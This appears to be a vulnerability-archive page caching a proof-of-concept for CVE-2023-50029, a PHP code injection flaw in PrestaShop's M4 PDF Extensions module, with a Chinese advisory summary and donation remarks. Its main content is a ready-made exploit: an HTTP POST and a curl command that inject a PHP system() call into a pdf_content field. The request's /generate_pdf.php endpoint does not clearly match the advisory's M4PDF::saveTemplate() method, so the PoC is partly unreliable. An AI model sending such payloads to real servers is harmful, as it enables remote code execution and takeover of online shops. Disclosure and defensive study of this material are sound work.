CVE-2023-50029 PoC — PrestaShop 安全漏洞

Source

https://github.com/absholi7ly/PHP-Injection-in-M4-PDF-Extensions

Associated Vulnerability

Title:PrestaShop 安全漏洞 (CVE-2023-50029)
Description:PrestaShop是美国PrestaShop公司的一套开源的电子商务解决方案。该方案提供多种支付方式、短消息提醒和商品图片缩放等功能。 PrestaShop m4pdf 3.3.2之前版本存在安全漏洞。攻击者利用该漏洞通过 M4PDF::saveTemplate() 方法运行任意代码。

Description

CVE-2023-50029: PHP Injection Vulnerability in M4 PDF Extensions Module

Readme

# PHP-Injection-in-M4-PDF-Extensions
CVE-2023-50029 is a PHP injection vulnerability in the M4 PDF Extensions module. This vulnerability allows attackers to inject and execute arbitrary PHP code on the server, enabling them to gain full control over the targeted system. The issue lies in the improper validation of inputs, allowing malicious code to be passed through user parameters.

### Poc
```
POST /generate_pdf.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

pdf_content=<?php system('uname -a'); ?>
```

### OR Curl
```
curl -X POST http://example.com/generate_pdf.php -d "pdf_content=<?php system('uname -a'); ?>"
```

File Snapshot


 [4.0K]  /data/pocs/073a2ac00642657b6d02792adb017d47b45670a4
└── [ 678]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!